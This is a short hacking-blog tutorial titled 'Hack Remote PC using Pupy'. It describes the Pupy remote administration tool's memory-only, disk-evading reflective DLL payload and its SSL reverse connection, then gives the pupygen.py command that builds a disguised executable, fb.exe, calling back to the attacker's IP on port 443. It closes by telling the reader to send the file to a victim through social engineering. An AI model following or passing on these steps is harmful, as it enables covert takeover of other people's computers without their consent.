Hacking Articles|Raj Chandel's Blog: Hack Remote PC using Pupy

Pupy is a remote administration tool with an embedded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. The payload is a reflective DLL and leaves no trace on disk.

· On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)

· Pupy can reflectively migrate into other processes

· Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).

· Modules are quite simple to write and pupy is easily extensible.

· Pupy uses rpyc and a module can directly access python objects on the remote client

· We can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works!

· Communication channel currently works as a SSL reverse connection, but a bind payload will be implemented in the future

· All the non interactive modules can be dispatched on multiple hosts in one command

· Multi-platform (tested on Windows 7, Windows Xp, kali Linux, Ubuntu)

· Modules can be executed as background jobs

· Commands and scripts running on remote hosts are interruptible

· Auto-completion and nice colored output :-)

· Commands aliases can be defined in the config.

First Download pupy-master from here and unzip in your pc.

Now run pip install rpyc in your terminal.

No go to puppy folder and type the following command and generate the payload.

./pupygen.py 192.168.1.6 -p 443 -t exe_x86 -o fb.exe

After we successfully generate the malicious exe File, it will stored on your local computer now send your fb.exe files to victim using any social engineering technique.